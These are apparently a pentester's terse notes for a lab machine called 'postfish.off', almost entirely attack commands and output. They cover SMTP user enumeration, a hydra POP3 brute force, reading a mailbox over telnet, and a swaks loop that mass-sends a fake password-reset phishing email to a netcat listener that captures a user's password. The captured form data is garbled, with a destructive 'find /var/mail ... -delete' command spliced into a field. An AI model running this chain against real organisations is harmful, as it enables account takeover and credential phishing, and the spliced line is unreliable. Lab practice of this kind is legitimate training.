Foothold

First.Last
FLast
FirstL
Claire.Madison
Cmadison
ClaireM
Mike.Ross
Mross
MikeR
Brian.Moore
Bmoore
Brianmoore
Sarah.Lorem
SLorem
SarahL

$ nmap -p25 --script=smtp* postfish.off
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 07:57 CDT
Nmap scan report for postfish.off (192.168.185.137)
Host is up (0.039s latency).
PORT STATE SERVICE
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
| smtp-enum-users:
|_ root
Nmap done: 1 IP address (1 host up) scanned in 20.53 seconds

$ smtp-user-enum -U users.lower -t postfish.off
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.lower
Target count ............. 1
Username count ........... 8
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Wed Sep 11 06:18:51 2024 #########
postfish.off: brian.moore exists
postfish.off: hr exists
postfish.off: sales exists
postfish.off: legal exists
postfish.off: mike.ross exists
postfish.off: sarah.lorem exists
postfish.off: it exists
postfish.off: claire.madison exists
######## Scan completed at Wed Sep 11 06:18:53 2024 #########
8 results.
8 queries in 2 seconds (4.0 queries / sec)

Found some valid usernames:
claire.madison
mike.ross
brian.moore
sarah.lorem
it
hr
sales
legal

$ hydra -L users.lower -P users.lower postfish.off pop3 -vV -I -t 10

sales:sales

$ telnet postfish.off 110
Trying 192.168.211.137...
Connected to postfish.off.
Escape character is '^]'.
+OK Dovecot (Ubuntu) ready.
user sales
+OK
pass sales
+OK Logged in.
list
+OK 1 messages:
1 683
.
retr 1
+OK 683 octets

[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

$ nc -lnvp 80
$ for i in $(cat emails.txt); do swaks --to [email protected] --from [email protected] --header 'Subject: Password Reset Link' --body 'Reset your password and get pwned here http://192.168.45.168' --server 192.168.211.137; done


first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confifind /var/mail/ -type f ! -name sales -delete_password%3DEternaLSunshinE
brian.moore:EternaLSunshinE
